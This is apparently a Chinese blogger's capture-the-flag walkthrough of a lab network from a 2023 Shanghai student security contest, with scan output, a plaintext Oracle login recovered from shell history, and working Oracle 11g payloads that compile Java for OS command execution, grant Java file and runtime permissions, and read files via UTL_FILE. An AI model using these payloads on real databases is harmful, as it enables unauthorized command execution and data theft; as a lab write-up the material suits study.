(icmp) Target 192.168.33.39 is alive(icmp) Target 192.168.33.5 is alive(icmp) Target 192.168.33.170 is alive(icmp) Target 192.168.33.172 is alive[*] Icmp alive hosts len is: 4192.168.33.5:445 open192.168.33.172:1521 open192.168.33.172:445 open192.168.33.170:445 open192.168.33.5:139 open192.168.33.172:139 open192.168.33.170:139 open192.168.33.5:135 open192.168.33.172:135 open192.168.33.170:135 open192.168.33.39:22 open192.168.33.5:88 open192.168.33.39:8983 open[*] alive ports len is: 13start vulscan[*] NetInfo:[*]192.168.33.170 [->]DBserver [->]192.168.33.170[*] NetBios: 192.168.33.5 [+]DC FOUR\AD4[*] NetBios: 192.168.33.170 FOUR\DBSERVER[*] NetBios: 192.168.33.172 FOUR\SERVER[*] NetInfo:[*]192.168.33.172 [->]server [->]192.168.33.172[*] WebTitle: http://192.168.33.39:8983 code:302 len:0 title:None 跳转url: http://192.168.33.39:8983/solr/[*] NetInfo:[*]192.168.33.5 [->]AD4 [->]192.168.33.5[*] WebTitle: http://192.168.33.39:8983/solr/ code:200 len:14543 title:Solr Admin[+] http://192.168.33.39:8983 poc-yaml-solr-cve-2019-0193[+] http://192.168.33.39:8983 poc-yaml-solr-velocity-template-rce
起个代理到内网
flag2 192.168.33.172 FOUR\SERVER Oracle db
history
sqlplus
system/Zr6kJG2U3m3A7BG@192.168.1.100:1521/orcl
192.168.33.172:1521
select * from v$version;
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit ProductionPL/SQL Release 11.2.0.1.0 - ProductionCORE11.2.0.1.0ProductionTNS for 64-bit Windows: Version 11.2.0.1.0 - ProductionNLSRTL Version 11.2.0.1.0 - Production命令执行 DBMS_XMLQUERY
select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual;select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual;select OBJECT_ID from all_objects where object_name ='LINXRUNCMD';
DECLAREPOL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;BEGINOPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;/DECLAREPOL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGINOPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;/DECLAREPOL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;BEGINOPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;/执行命令:
select LinxRUNCMD('whoami') from dual;发现不能有空格。。
https://github.com/jas502n/oracleShell
这工具感觉只支持 Linux 的命令执行,还得手动读文件。。
数据库读取文件方式总结
https://uuzdaisuki.com/2020/07/10/数据库读取文件方式总结/
create or replace directory user_dir as 'C:\Users\Administrator\Desktop\';grant read on directory user_dir to public;grant write on directory user_dir to public;select * from dba_directories;
declareF1 utl_file.file_type;V1 varchar2(32767);beginF1:=utl_file.fopen('USER_DIR','flag','r');utl_file.get_line(F1,V1,50);utl_file.fclose(F1);dbms_output.put_line(V1);end;小结
于是通宵打了两天漏洞渗透靶场,累死了
感觉Windows攻防这一块喵喵还不大熟悉,后面有机会有空的话再来补一补.jpg ~~(咕咕咕~~)
吐槽一下怎么不是所有机器都有flag,好不容易日了一台机器下来,上去发现啥都没有,好亏啊!
然后又想到去年线下打鹏城杯那个靶场,靶机里数据库web服务root下好几个地方放了flag,虽然容易漏但是至少拿下机器shell有flag的反馈还是挺乐的,虽然打得也挺累的就是了。
还有个挺坑的地方是,他靶机的DNS都配的是192.168下的,但是那个IP又连不通,于是如果反弹shell或者下载带域名的URL就解析不出来了,整的喵喵还以为不通外网,后来直接试IP发现能访问才猜到是这样的。
而且VPN网段不能弹shell回来,中间的路由直接丢了,而且通过VPN访问也是走的中间的机器跳过去的
(不过这漏洞挖掘的比赛也好卷啊!)
喵喵一个人拿了1k分,也就是拿了5个flag,人麻了
可惜最后CTF和漏洞挖掘居然是按照7:3的比例把分数加起来,感觉亏死了!!!
于是连着打了三天,累累,呜呜
不过说来这应该是喵喵最后一次打上海市赛了吧(喵呜喵呜喵)
(溜了溜了喵)
往期推荐
原创 | 2023年第八届上海市大学生网络安全大赛 / 磐石行动 漏洞挖掘 Workthrough(上)